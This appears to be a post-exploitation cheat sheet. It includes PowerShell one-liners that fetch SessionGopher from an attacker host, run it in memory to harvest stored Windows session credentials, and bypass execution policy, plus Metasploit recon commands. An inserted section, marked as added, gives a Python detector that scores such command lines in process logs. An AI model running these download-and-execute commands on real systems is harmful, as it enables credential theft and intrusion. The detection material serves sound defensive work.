Post Exploitation

Windows

Harvest credentials with SessionGopher

# Download and run SessionGopher from memory
powershell.exe -nop -ep bypass -C iex (New-Object Net.WebClient).DownloadString('http://<attacker ip>/SessionGopher.ps1'); Invoke-SessionGopher

# Run a more thorough search with the -Thorough switch
powershell.exe -nop -ep bypass -C iex (New-Object Net.WebClient).DownloadString('http://<attacker ip>/SessionGopher.ps1'); Invoke-SessionGopher -Thorough
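
Detection side of the commands above, as an added example that is not part of the original page: a small triage pass over process-creation events (the kind recorded by Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing) that scores PowerShell command lines on the traits these one-liners share. The event field names, weights, threshold and sample events are assumptions constructed for illustration.

```python
import re

# Indicators drawn from the command lines on this page; the weights are assumptions.
INDICATORS = {
    "no_profile": (re.compile(r"(?<!\S)-nop(?:rofile)?\b", re.I), 1),
    "exec_policy_bypass": (re.compile(r"(?<!\S)-e(?:p|xecutionpolicy)\s+bypass\b", re.I), 2),
    "web_download": (re.compile(r"Net\.WebClient|\.DownloadString\(", re.I), 2),
    "invoke_expression": (re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I), 2),
    "sessiongopher": (re.compile(r"Invoke-SessionGopher|SessionGopher\.ps1", re.I), 3),
}
ALERT_THRESHOLD = 5  # assumed cut-off: a lone -NoProfile or a lone download stays below it

def score_command_line(cmdline):
    """Return (score, sorted names of matched indicators) for one command line."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(cmdline)]
    return sum(INDICATORS[name][1] for name in hits), sorted(hits)

def triage(events):
    """events: dicts with 'host', 'image', 'cmdline' (hypothetical field names).
    Only PowerShell processes are scored; returns one alert per event at or above threshold."""
    alerts = []
    for ev in events:
        if not re.search(r"(?:^|\\)(?:powershell|pwsh)\.exe$", ev["image"], re.I):
            continue
        score, hits = score_command_line(ev["cmdline"])
        if score >= ALERT_THRESHOLD:
            alerts.append({"host": ev["host"], "score": score, "indicators": hits})
    return alerts

# Constructed sample events, not real telemetry; 192.0.2.10 is a documentation address.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -ep bypass -C iex (New-Object Net.WebClient)"
                ".DownloadString('http://192.0.2.10/SessionGopher.ps1'); Invoke-SessionGopher -Thorough"},
    {"host": "WS02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"},
    {"host": "WS03", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c netstat -ano"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Command-line matching only sees what the process was launched with; PowerShell script block logging (Event ID 4104) records the downloaded script body itself and covers renamed or abbreviated switches that these patterns miss.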

Retrieve useful information with Metasploit

# Retrieve available network interfaces
ifconfig

# List neighbouring devices from the host's ARP cache
arp

# Check out the routing table
route

# Drop into a system shell and list active network connections
shell
netstat -ano

# Drop into a system shell and list running services
shell
wmic service where started=true get caption
